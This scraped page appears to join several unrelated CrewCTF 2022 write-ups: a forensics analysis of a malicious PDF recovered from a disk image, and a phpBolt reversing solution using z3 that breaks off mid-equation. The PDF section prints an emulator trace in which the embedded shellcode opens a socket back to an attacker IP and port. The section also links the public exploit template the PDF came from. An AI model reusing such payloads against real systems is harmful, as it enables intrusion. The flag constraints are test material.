0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template> </div> <div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
I've made a temporary directory `mkdir /tmp/image` as mount point to image. To work with .EWF files we need a ewf-tools package on system. After mounting image with `ewfmount Image.E01 /tmp/image/` I've discovered single file `ewf1` inside it. I get that it a NTFS file system running `xxd ewf1 | head` and copied it from read-only partition to the home directory. Next I've mounted it with `ntfs-3g ewf1 /tmp/image2` command. I did a `file *` in single directory inside $RECYCLE.BIN and noticed that there are single valid PDF-file inside. ![](https://github.com/kperevoznikova/writeups/raw/main/CrewCTF%202022/pics/policy1.png) I copied it to Windows machine with [PDF Stream Dumper](http://sandsprite.com/blogs/index.php?pid=57&uid=7) installed and hit the "Exploits_Scan" button. ![](https://github.com/kperevoznikova/writeups/raw/main/CrewCTF%202022/pics/policy2.jpg)
## Pt. 2 For this part, we need to find out the Attackers IP. As there is no connection info in the Autopsy report, I eventually realized, that the pdf itself must contain the attacker IP to send something back to him.I found this [file](https://github.com/mobmewireless/origami-pdf/blob/master/samples/exploits/cve-2008-2992-utilprintf.rb) that was used to create the pdf but I was not able to find out how to extract the shellcode out of it at first sight. Then I searched a little more and found this [website](https://www.adlice.com/infected-pdf-extract-payload/). Before using that one, I first wanted to try to do it with https://github.com/PCsXcetra/DerbyCon-2019Files which did not work... To finally solve the challenge, I installed [PDFStreamDumper](http://sandsprite.com/blogs/index.php?pid=57&uid=7), highlighted the shellcode inside of the pdf (one of the objects at the left) And then opened the Javascript UI to analyze the shellcode I ran it and got the IP as the output! ```Loaded 400 bytes from file sample.scInitialization Complete..Max Steps: 2000000Using base offset: 0x401000 401348 LoadLibraryA(ws2_32)401358 WSAStartup(190)401375 WSASocket(af=2, tp=1, proto=0, group=0, flags=0)401381 connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07401381 connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07401381 connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07401381 connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07 Stepcount 2000001``` Solved!
# ezbolt (Rev) phpBolt - Best php encoder: Encrypt and decrypt php source code. Ensure only licensed people are using. Free for small and medium companies. Encode and run PHP files. Ioncube alternative (free) Waste of time (free) Ezbolt was a reversing challenge from CrewCTF, among 700+ teams, only ~20 teams solved it. The challenge had something todo with phpBolt which is an open source encoding project that can be found [here](https://github.com/arshidkv12/phpBolt). Authors provided the following file:```phpmemcpy(0x7fb350886018, ```This looks like the original code, which means that we have successfully retrieved the code. However, the code is completley obfuscated, which I do believe this is why others struggled with it a bit. I took a smarter approach where I did some string replacements, some minor enhancements, and this was the result: ```python...snip...flag[26]+flag[18]-flag[37]*flag[9]==-2844flag[36]^flag[13]-flag[27]==46flag[14]^flag[15]*flag[32]^flag[35]-flag[21]==11194flag[9]^flag[11]*flag[14]-flag[10]^flag[31]==5811flag[10]-flag[27]+flag[28]^flag[35]+flag[37]==19flag[29]+flag[23]*flag[21]==10545flag[28]+flag[0]*flag[24]==9915flag[29]-flag[26]*flag[3]==-11805flag[24]+flag[29]-flag[4]*flag[35]+flag[32]==-14592flag[16]-flag[25]^flag[22]*flag[27]==2573flag[19]^flag[11]*flag[16]==9848flag[19]^flag[28]-flag[38]+flag[27]^flag[3]==55flag[4]-flag[2]+flag[25]==70flag[21]*flag[13]-flag[14]*flag[3]==201flag[19]+flag[14]-flag[11]*flag[36]+flag[21]==-3578...snip...``` These looked like constrains, I simply used z3 to solve the challenge, I came up with the following script: ```pythonfrom z3_staff import * # https://github.com/KosBeg/z3_staff flag = create_vars(39, size=8) # create and return 39 BitVecs with size 8s = solver() # create and return solverset_ranges() # set ASCII ranges(printable chars) for all vars created by create_vars set_known_bytes('crew{*}', type='ff') # set known flag format, or we can use without ", type='ff'" like "set_known_bytes('crew{' + '*'* + '}')" # add all known equationsadd_eq(flag[26]+flag[18]-flag[37]*flag[9]==-2844)add_eq(flag[36]^flag[13]-flag[27]==46)add_eq(flag[14]^flag[15]*flag[32]^flag[35]-flag[21]==11194)add_eq(flag[9]^flag[11]*flag[14]-flag[10]^flag[31]==5811)add_eq(flag[10]-flag[27]+flag[28]^flag[35]+flag[37]==19)add_eq(flag[29]+flag[23]*flag[21]==10545)add_eq(flag[28]+flag[0]*flag[24]==9915)add_eq(flag[29]-flag[26]*flag[3]==-11805)add_eq(flag[24]+flag[29]-flag[4]*flag[35]+flag[32]==-14592)add_eq(flag[16]-flag[25]^flag[22]*flag[27]==2573)add_eq(flag[19]^flag[11]*flag[16]==9848)add_eq(flag[19]^flag[28]-flag[38]+flag[27]^flag[3]==55)add_eq(flag[4]-flag[2]+flag[25]==70)add_eq(flag[21]*flag[13]-flag[14]*flag[3]==201)add_eq(flag[19]+flag[14]-flag[11]*flag[36]+flag[21]==-3578)add_eq(flag[26]^flag[33]*flag[8]==7100)add_eq(flag[36]*flag[7]-flag[21]==3601)add_eq(flag[16]-flag[1]^flag[33]==-114)add_eq(flag[37]^flag[8]-flag[21]+flag[16]==8)add_eq(flag[34]^flag[25]*flag[18]+flag[21]==3950)add_eq(flag[27]-flag[28]^flag[6]*flag[1]==-11887)add_eq(flag[27]+flag[31]-flag[5]+flag[21]==85)add_eq(flag[18]^flag[29]*flag[16]+flag[0]*flag[5]==18988)add_eq(flag[14]-flag[30]+flag[29]==32)add_eq(flag[27]-flag[37]^flag[9]+flag[0]*flag[20]==-7980)add_eq(flag[28]*flag[33]^flag[25]-flag[2]+flag[6]==12331)add_eq(flag[24]^flag[23]*flag[6]+flag[37]*flag[22]==14686)add_eq(flag[11]*flag[31]^flag[25]-flag[16]*flag[22]==-1944)add_eq(flag[10]+flag[36]*flag[18]==2748)add_eq(flag[12]-flag[21]*flag[31]==-4750)add_eq(flag[22]+flag[26]^flag[13]==213)add_eq(flag[19]^flag[30]+flag[22]-flag[20]^flag[21]==98)add_eq(flag[12]+flag[37]*flag[34]==3182)add_eq(flag[0]*flag[12]-flag[26]+flag[5]^flag[16]==9373)add_eq(flag[37]-flag[13]^flag[38]==-128)add_eq(flag[14]+flag[19]*flag[10]+flag[28]-flag[21]==11302)add_eq(flag[20]^flag[14]*flag[1]==5862)add_eq(flag[17]+flag[15]^flag[9]==226)add_eq(flag[24]-flag[30]^flag[29]==-82)add_eq(flag[36]+flag[25]^flag[12]==14)add_eq(flag[4]*flag[13]-flag[5]==8006)add_eq(flag[14]*flag[10]-flag[28]==5394)add_eq(flag[15]+flag[28]*flag[1]^flag[20]==13159)add_eq(flag[37]+flag[38]^flag[12]==227)add_eq(flag[32]+flag[23]-flag[22]*flag[1]+flag[20]==-5527)add_eq(flag[20]-flag[27]^flag[29]*flag[3]-flag[7]==11172)add_eq(flag[32]*flag[31]-flag[9]*flag[24]==195)add_eq(flag[25]*flag[26]^flag[9]-flag[19]==-4856)add_eq(flag[18]+flag[2]*flag[0]-flag[16]^flag[37]==10036)add_eq(flag[0]^flag[35]*flag[30]==13697)add_eq(flag[26]+flag[9]^flag[14]+flag[7]^flag[4]==76)add_eq(flag[34]+flag[18]*flag[38]-flag[32]==9952)add_eq(flag[7]-flag[0]+flag[36]-flag[11]==-70)add_eq(flag[31]*flag[37]+flag[29]==3308)add_eq(flag[25]^flag[21]*flag[38]==11859)add_eq(flag[26]^flag[10]+flag[5]==184)add_eq(flag[16]-flag[10]*flag[25]==-5100)add_eq(flag[36]^flag[13]+flag[1]*flag[23]==12575)add_eq(flag[17]^flag[29]-flag[8]+flag[18]==50)add_eq(flag[3]-flag[32]*flag[23]==-10551)add_eq(flag[10]^flag[31]+flag[4]^flag[11]-flag[27]==131)add_eq(flag[35]-flag[18]*flag[9]+flag[15]-flag[8]==-3670)add_eq(flag[0]^flag[28]*flag[7]+flag[19]==12843)add_eq(flag[15]^flag[11]+flag[35]==158)add_eq(flag[38]-flag[25]^flag[37]==114)add_eq(flag[3]+flag[22]*flag[25]-flag[15]+flag[27]==2503)add_eq(flag[17]^flag[11]-flag[16]+flag[19]*flag[8]==6831)add_eq(flag[38]*flag[11]^flag[33]-flag[8]==14478)add_eq(flag[9]*flag[12]^flag[2]==4533)add_eq(flag[9]*flag[6]^flag[16]==5076)add_eq(flag[23]-flag[22]^flag[14]+flag[10]*flag[17]==10364)add_eq(flag[28]+flag[21]*flag[18]==7714)add_eq(flag[0]+flag[18]-flag[5]^flag[3]-flag[9]==4)add_eq(flag[20]+flag[21]*flag[31]==4925)add_eq(flag[19]-flag[34]*flag[17]-flag[32]^flag[37]==-4633)add_eq(flag[36]^flag[34]*flag[16]^flag[33]*flag[22]==1457)add_eq(flag[34]-flag[32]*flag[24]^flag[37]==-9583)add_eq(flag[0]+flag[9]*flag[17]-flag[2]==4558)add_eq(flag[35]+flag[26]-flag[13]+flag[34]^flag[10]==160)add_eq(flag[6]+flag[22]-flag[8]^flag[3]==46)add_eq(flag[10]*flag[12]+flag[28]==10374)add_eq(flag[15]-flag[16]^flag[24]==124)add_eq(flag[5]^flag[23]+flag[10]-flag[14]*flag[9]==-2246)add_eq(flag[13]^flag[6]+flag[25]*flag[19]-flag[27]==5111)add_eq(flag[27]*flag[26]^flag[13]-flag[37]*flag[30]==-2088)add_eq(flag[29]-flag[20]*flag[23]^flag[31]==-8756)add_eq(flag[38]*flag[7]^flag[6]*flag[4]==1864)add_eq(flag[1]*flag[13]^flag[20]+flag[3]==7587)add_eq(flag[11]^flag[6]*flag[31]^flag[2]*flag[29]==12727)add_eq(flag[26]^flag[5]+flag[31]-flag[32]==38)add_eq(flag[37]*flag[2]+flag[3]-flag[14]==6431)add_eq(flag[24]^flag[1]*flag[36]+flag[29]==3954)add_eq(flag[26]*flag[14]-flag[2]==4999)add_eq(flag[27]*flag[18]-flag[32]==3983)add_eq(flag[6]*flag[23]+flag[29]*flag[18]+flag[10]==19148)add_eq(flag[34]+flag[13]^flag[0]==16)add_eq(flag[22]+flag[21]-flag[2]==45)add_eq(flag[10]^flag[3]-flag[9]+flag[8]==229)add_eq(flag[7]-flag[31]*flag[1]==-5702)add_eq(flag[1]^flag[14]*flag[27]-flag[21]==2488)add_eq(flag[31]+flag[24]^flag[0]==245)add_eq(flag[8]-flag[27]+flag[11]-flag[33]==23)add_eq(flag[23]*flag[32]+flag[8]^flag[3]==10631)add_eq(flag[6]+flag[25]-flag[22]==101)add_eq(flag[23]+flag[36]^flag[38]+flag[16]^flag[26]==58)add_eq(flag[10]*flag[8]+flag[26]==7228)add_eq(flag[0]+flag[2]-flag[21]==105)add_eq(flag[16]*flag[6]+flag[35]^flag[12]+flag[33]==8786)add_eq(flag[20]*flag[9]+flag[11]==3956)add_eq(flag[8]^flag[31]-flag[2]*flag[13]==-6549)add_eq(flag[35]*flag[12]+flag[19]==11599)add_eq(flag[35]-flag[38]^flag[15]+flag[36]==-152)add_eq(flag[3]*flag[8]-flag[19]==7750)add_eq(flag[37]+flag[12]-flag[27]+flag[22]^flag[19]==246)add_eq(flag[26]^flag[0]+flag[13]*flag[10]-flag[7]==7087)add_eq(flag[0]+flag[28]*flag[18]==9219)add_eq(flag[3]-flag[32]*flag[34]==-4634)add_eq(flag[19]^flag[7]-flag[14]*flag[21]==-4629)add_eq(flag[35]-flag[3]*flag[9]-flag[36]==-5624)add_eq(flag[16]*flag[11]-flag[4]*flag[34]==3717)add_eq(flag[27]*flag[33]+flag[14]==5559)add_eq(flag[30]+flag[15]^flag[6]==141)add_eq(flag[10]*flag[30]-flag[28]+flag[12]==12293)add_eq(flag[22]+flag[10]*flag[8]^flag[20]==7259)add_eq(flag[13]-flag[26]+flag[0]==65)add_eq(flag[10]^flag[31]-flag[32]==-66)add_eq(flag[26]-flag[27]^flag[12]*flag[6]==9897)add_eq(flag[17]+flag[20]^flag[31]*flag[33]==5419)add_eq(flag[26]-flag[38]*flag[27]^flag[36]+flag[17]==-6147)add_eq(flag[14]*flag[9]+flag[18]^flag[17]*flag[32]==10783)add_eq(flag[34]^flag[23]+flag[22]==144)add_eq(flag[37]*flag[7]-flag[38]+flag[14]==6982)add_eq(flag[19]^flag[15]-flag[27]==40)add_eq(flag[8]^flag[12]+flag[37]-flag[22]==41)add_eq(flag[36]*flag[2]^flag[16]==3409)add_eq(flag[19]*flag[25]+flag[1]*flag[26]==16392)add_eq(flag[35]^flag[33]-flag[5]==-123)add_eq(flag[16]*flag[28]+flag[17]^flag[11]+flag[20]==9475)add_eq(flag[34]+flag[9]*flag[29]+flag[26]-flag[0]==4610)add_eq(flag[37]-flag[2]*flag[20]+flag[38]-flag[32]==-7989)add_eq(flag[31]-flag[18]*flag[10]==-8589)add_eq(flag[15]-flag[32]+flag[14]^flag[8]-flag[10]==-109)add_eq(flag[5]^flag[37]-flag[3]+flag[33]==68)add_eq(flag[21]*flag[10]^flag[20]+flag[11]^flag[30]==10402)add_eq(flag[30]-flag[36]^flag[16]==5)add_eq(flag[33]+flag[5]*flag[11]==13100)add_eq(flag[19]-flag[11]*flag[15]==-13236)add_eq(flag[25]-flag[18]^flag[1]+flag[26]==-202)add_eq(flag[25]*flag[7]^flag[32]+flag[15]^flag[4]==5551)add_eq(flag[10]+flag[28]^flag[33]-flag[23]==-224)add_eq(flag[0]*flag[21]+flag[16]*flag[32]^flag[1]==17635)add_eq(flag[26]-flag[27]^flag[29]*flag[24]==9356)add_eq(flag[17]^flag[32]+flag[14]*flag[27]==2773)add_eq(flag[10]-flag[30]^flag[22]==-55)add_eq(flag[13]+flag[16]*flag[34]==4182)add_eq(flag[21]-flag[36]*flag[0]-flag[2]==-3273)add_eq(flag[33]+flag[8]*flag[12]-flag[10]==6270)add_eq(flag[22]+flag[27]*flag[15]-flag[31]==5865)add_eq(flag[23]^flag[29]-flag[4]*flag[3]==-14500)add_eq(flag[3]^flag[30]*flag[18]^flag[12]==9096)add_eq(flag[8]^flag[23]+flag[4]==171)add_eq(flag[32]^flag[30]*flag[8]-flag[25]+flag[10]==7617)add_eq(flag[16]-flag[38]^flag[2]==-78)add_eq(flag[3]^flag[25]*flag[5]+flag[10]==5403)add_eq(flag[14]*flag[16]+flag[0]==4383)add_eq(flag[20]*flag[4]-flag[31]==9789)add_eq(flag[26]+flag[0]^flag[11]*flag[8]==7471)add_eq(flag[9]+flag[3]*flag[26]==11948)add_eq(flag[21]+flag[13]*flag[26]+flag[8]*flag[5]==14087)add_eq(flag[11]^flag[16]+flag[20]-flag[3]+flag[24]==228)add_eq(flag[15]-flag[4]^flag[27]*flag[35]-flag[33]==-6057)add_eq(flag[9]-flag[29]*flag[5]==-10592)add_eq(flag[33]-flag[3]*flag[7]==-13220)add_eq(flag[5]+flag[26]-flag[27]==161)add_eq(flag[5]-flag[37]^flag[1]-flag[24]+flag[25]==14)add_eq(flag[35]^flag[38]*flag[36]==4196)add_eq(flag[3]-flag[22]+flag[10]*flag[16]+flag[34]==9189)add_eq(flag[26]*flag[25]-flag[35]+flag[33]-flag[31]==4736)add_eq(flag[25]-flag[37]+flag[9]-flag[35]*flag[23]==-13277)add_eq(flag[35]+flag[19]^flag[7]+flag[26]==53)add_eq(flag[29]-flag[19]^flag[26]*flag[25]+flag[23]==-4903)add_eq(flag[37]*flag[2]^flag[36]==6394)add_eq(flag[26]-flag[12]*flag[21]==-8925)add_eq(flag[17]+flag[18]*flag[3]^flag[13]+flag[23]==9535)add_eq(flag[17]+flag[12]-flag[1]*flag[28]^flag[7]==-12918)add_eq(flag[0]^flag[21]*flag[28]-flag[11]+flag[29]==10842)add_eq(flag[1]+flag[25]^flag[27]+flag[21]==48)add_eq(flag[0]+flag[36]*flag[21]==3234)add_eq(flag[6]*flag[13]-flag[24]*flag[20]-flag[28]==-1170)add_eq(flag[9]^flag[37]+flag[2]-flag[5]^flag[21]==91)add_eq(flag[8]-flag[10]+flag[6]*flag[16]-flag[7]==8582)add_eq(flag[25]*flag[14]+flag[28]^flag[27]==2609)add_eq(flag[27]*flag[28]^flag[38]==5835)add_eq(flag[10]^flag[5]+flag[36]^flag[37]+flag[22]==143)add_eq(flag[29]-flag[10]*flag[37]^flag[4]+flag[36]==-6825)add_eq(flag[6]^flag[31]+flag[1]-flag[0]==42)add_eq(flag[17]+flag[28]*flag[21]+flag[11]^flag[24]==11074)add_eq(flag[24]+flag[10]*flag[8]==7227)add_eq(flag[20]*flag[35]+flag[4]^flag[13]+flag[37]==9930)add_eq(flag[23]^flag[5]*flag[28]^flag[25]==12734)add_eq(flag[13]+flag[29]*flag[0]^flag[33]==9363)add_eq(flag[19]+flag[26]^flag[35]+flag[20]^flag[5]==117)add_eq(flag[19]-flag[26]*flag[35]-flag[16]==-12080)add_eq(flag[31]+flag[37]-flag[3]+flag[25]^flag[13]==105)add_eq(flag[16]^flag[24]*flag[31]^flag[32]==5004)add_eq(flag[33]-flag[35]+flag[14]==38)add_eq(flag[18]^flag[29]-flag[36]==110)add_eq(flag[35]^flag[15]*flag[16]-flag[32]^flag[17]==9597)add_eq(flag[24]^flag[38]-flag[22]*flag[4]==-6241)add_eq(flag[30]+flag[31]-flag[36]==132)add_eq(flag[11]^flag[4]-flag[3]+flag[26]*flag[13]==6584)add_eq(flag[7]-flag[30]+flag[37]*flag[27]-flag[4]==3088)add_eq(flag[37]+flag[3]-flag[30]==68)add_eq(flag[23]+flag[10]-flag[20]+flag[15]-flag[7]==141)add_eq(flag[12]-flag[3]*flag[31]+flag[5]*flag[29]==4666)add_eq(flag[37]*flag[16]+flag[3]*flag[7]==18620)add_eq(flag[38]+flag[7]-flag[17]+flag[13]==208)add_eq(flag[38]*flag[11]-flag[26]^flag[32]+flag[36]==14530)add_eq(flag[29]+flag[9]-flag[7]==31)add_eq(flag[30]+flag[3]*flag[31]^flag[38]*flag[34]==4042)add_eq(flag[3]-flag[8]^flag[9]-flag[21]+flag[4]==121)add_eq(flag[31]^flag[3]+flag[14]^flag[16]-flag[20]==157)add_eq(flag[2]-flag[9]*flag[37]==-2923)add_eq(flag[1]-flag[37]^flag[8]*flag[10]-flag[23]==7001)add_eq(flag[19]-flag[31]^flag[10]*flag[32]^flag[36]==10488)add_eq(flag[0]^flag[38]+flag[24]-flag[30]+flag[23]==191)add_eq(flag[9]-flag[29]^flag[0]-flag[2]^flag[5]==95)add_eq(flag[33]-flag[23]+flag[35]==119)add_eq(flag[2]^flag[5]+flag[25]*flag[13]==3253)add_eq(flag[7]*flag[30]^flag[28]-flag[14]==12767)add_eq(flag[7]^flag[15]*flag[38]==14423)add_eq(flag[26]+flag[9]^flag[25]*flag[29]-flag[22]==4361)add_eq(flag[31]*flag[25]-flag[38]==2323)add_eq(flag[31]^flag[35]*flag[1]-flag[38]+flag[6]==13822)add_eq(flag[33]+flag[35]-flag[29]+flag[4]^flag[6]==361)add_eq(flag[26]-flag[33]^flag[6]+flag[11]-flag[7]==-108)add_eq(flag[17]-flag[0]^flag[33]-flag[10]==-4)add_eq(flag[26]+flag[14]^flag[35]*flag[32]==11598)add_eq(flag[24]^flag[1]+flag[26]-flag[23]==11)add_eq(flag[38]+flag[28]-flag[25]^flag[4]==196)add_eq(flag[4]*flag[0]^flag[3]+flag[2]==12109)add_eq(flag[29]*flag[33]^flag[10]*flag[8]==13260)add_eq(flag[24]^flag[37]+flag[8]-flag[18]==82)add_eq(flag[8]*flag[27]^flag[38]==3419)add_eq(flag[26]*flag[4]^flag[38]==12401)add_eq(flag[22]+flag[19]^flag[13]-flag[12]==-136)add_eq(flag[15]^flag[5]-flag[28]+flag[34]*flag[35]==5972)add_eq(flag[13]+flag[37]-flag[20]*flag[16]+flag[27]==-6540)add_eq(flag[6]-flag[28]^flag[38]*flag[29]==-11883)add_eq(flag[35]-flag[1]*flag[11]^flag[34]==-13088)add_eq(flag[34]*flag[14]-flag[25]==2451)add_eq(flag[19]-flag[24]+flag[38]^flag[6]==234)add_eq(flag[32]-flag[31]+flag[35]^flag[37]==152)add_eq(flag[33]^flag[23]-flag[15]*flag[29]-flag[34]==-10756)add_eq(flag[7]-flag[16]^flag[6]*flag[17]^flag[31]==9911)add_eq(flag[19]-flag[5]+flag[32]==89)add_eq(flag[20]-flag[27]+flag[18]*flag[31]^flag[37]==4146)add_eq(flag[9]-flag[4]^flag[37]-flag[28]==120)add_eq(flag[0]*flag[11]-flag[37]*flag[9]+flag[23]==8570)add_eq(flag[36]*flag[30]+flag[0]^flag[4]==3950)add_eq(flag[28]*flag[24]-flag[35]^flag[32]==11260)add_eq(flag[33]+flag[25]^flag[36]-flag[1]==-205)add_eq(flag[35]-flag[7]^flag[30]==123)add_eq(flag[24]*flag[29]^flag[16]+flag[10]==9341)add_eq(flag[32]*flag[3]-flag[24]==11444)add_eq(flag[27]*flag[31]^flag[2]==2636)add_eq(flag[1]*flag[38]-flag[15]*flag[14]==8385)add_eq(flag[28]+flag[1]*flag[25]-flag[11]*flag[0]==-5898)add_eq(flag[30]+flag[13]^flag[35]==205)add_eq(flag[27]-flag[21]^flag[25]+flag[28]==-138)add_eq(flag[27]*flag[3]^flag[24]+flag[2]^flag[6]==5909)add_eq(flag[1]*flag[10]^flag[23]==12406)add_eq(flag[15]^flag[34]-flag[12]*flag[23]+flag[29]==-10291)add_eq(flag[36]-flag[31]+flag[6]==86)add_eq(flag[20]^flag[28]-flag[17]*flag[34]^flag[14]==-4576)add_eq(flag[12]*flag[30]^flag[23]+flag[2]==10909)add_eq(flag[4]*flag[7]^flag[0]==13747)add_eq(flag[15]^flag[25]*flag[22]==2531)add_eq(flag[13]-flag[24]^flag[34]==-18)add_eq(flag[17]^flag[18]-flag[31]==66)add_eq(flag[6]^flag[23]*flag[32]+flag[30]-flag[24]==10709)add_eq(flag[0]+flag[4]*flag[25]-flag[24]^flag[7]==5984)add_eq(flag[21]+flag[38]*flag[24]^flag[20]==12518)add_eq(flag[16]+flag[20]*flag[6]-flag[2]==8303)add_eq(flag[21]^flag[24]*flag[30]-flag[16]==11165)add_eq(flag[28]*flag[13]+flag[15]==7639)add_eq(flag[1]*flag[28]-flag[11]^flag[3]==12839)add_eq(flag[28]-flag[11]*flag[19]+flag[35]*flag[29]==-455)add_eq(flag[29]+flag[24]*flag[23]-flag[3]==10866)add_eq(flag[25]-flag[5]^flag[29]==-97)add_eq(flag[19]+flag[9]*flag[24]-flag[17]==4761)add_eq(flag[12]+flag[5]*flag[1]^flag[27]-flag[20]==-12836)add_eq(flag[30]^flag[32]*flag[38]-flag[16]^flag[28]==12041)add_eq(flag[19]-flag[13]^flag[35]-flag[0]+flag[38]==181)add_eq(flag[34]^flag[13]+flag[29]==144)add_eq(flag[9]^flag[8]-flag[22]+flag[29]==94)add_eq(flag[13]+flag[2]-flag[4]==44)add_eq(flag[4]-flag[7]^flag[14]+flag[38]*flag[3]==14917)add_eq(flag[35]*flag[33]^flag[29]-flag[18]==13059)add_eq(flag[14]^flag[0]-flag[25]^flag[27]-flag[35]==-70)add_eq(flag[6]*flag[31]-flag[21]==5209)add_eq(flag[12]^flag[13]+flag[4]*flag[0]+flag[27]==12377)add_eq(flag[0]+flag[9]*flag[17]-flag[35]+flag[33]==4646)add_eq(flag[15]+flag[11]^flag[22]+flag[31]^flag[0]==226)add_eq(flag[25]-flag[7]^flag[35]==-71)add_eq(flag[2]^flag[31]+flag[11]-flag[6]^flag[1]==40)add_eq(flag[23]^flag[38]-flag[19]==123)add_eq(flag[23]^flag[16]-flag[1]*flag[24]^flag[17]==-11249)add_eq(flag[6]-flag[36]+flag[11]^flag[16]==239)add_eq(flag[5]-flag[4]*flag[20]^flag[32]==-9631)add_eq(flag[4]-flag[29]*flag[32]^flag[28]==-9202)add_eq(flag[30]-flag[14]^flag[24]-flag[18]==44)add_eq(flag[17]+flag[38]*flag[34]^flag[3]==6203)add_eq(flag[30]+flag[19]*flag[14]==5418)add_eq(flag[20]^flag[6]+flag[2]==157)add_eq(flag[24]^flag[13]-flag[14]==108)add_eq(flag[36]-flag[30]+flag[38]==44)add_eq(flag[38]+flag[20]^flag[2]+flag[17]*flag[34]==4697)add_eq(flag[34]^flag[28]-flag[23]*flag[35]+flag[19]==-13075)add_eq(flag[17]^flag[19]+flag[15]==132)add_eq(flag[18]+flag[14]*flag[20]==4160)add_eq(flag[12]-flag[8]*flag[5]==-7297)add_eq(flag[21]-flag[14]*flag[23]==-5515)add_eq(flag[34]*flag[22]+flag[32]-flag[12]==2501)add_eq(flag[12]+flag[8]*flag[30]+flag[23]*flag[21]==18069)add_eq(flag[9]*flag[4]+flag[7]^flag[20]+flag[14]==5891)add_eq(flag[14]*flag[7]-flag[32]+flag[4]==5738)add_eq(flag[2]-flag[36]*flag[18]^flag[19]==-2435)add_eq(flag[7]*flag[34]+flag[11]==5604)add_eq(flag[33]*flag[27]+flag[17]==5603)add_eq(flag[18]+flag[14]^flag[36]-flag[17]==-191)add_eq(flag[4]-flag[36]+flag[22]*flag[1]+flag[9]==5952)add_eq(flag[4]^flag[38]-flag[34]+flag[28]*flag[5]==12887)add_eq(flag[8]-flag[33]*flag[19]+flag[30]-flag[12]==-11147)add_eq(flag[19]+flag[36]^flag[6]*flag[9]==4873)add_eq(flag[22]*flag[5]^flag[32]*flag[20]-flag[12]==2977)add_eq(flag[13]-flag[11]*flag[24]+flag[5]==-11306)add_eq(flag[23]*flag[11]+flag[34]^flag[12]==12886)add_eq(flag[34]-flag[18]+flag[15]*flag[23]-flag[9]==12571)add_eq(flag[15]-flag[2]*flag[11]-flag[7]==-11713)add_eq(flag[6]+flag[24]*flag[5]^flag[13]*flag[32]==12986)add_eq(flag[30]*flag[11]^flag[22]-flag[33]+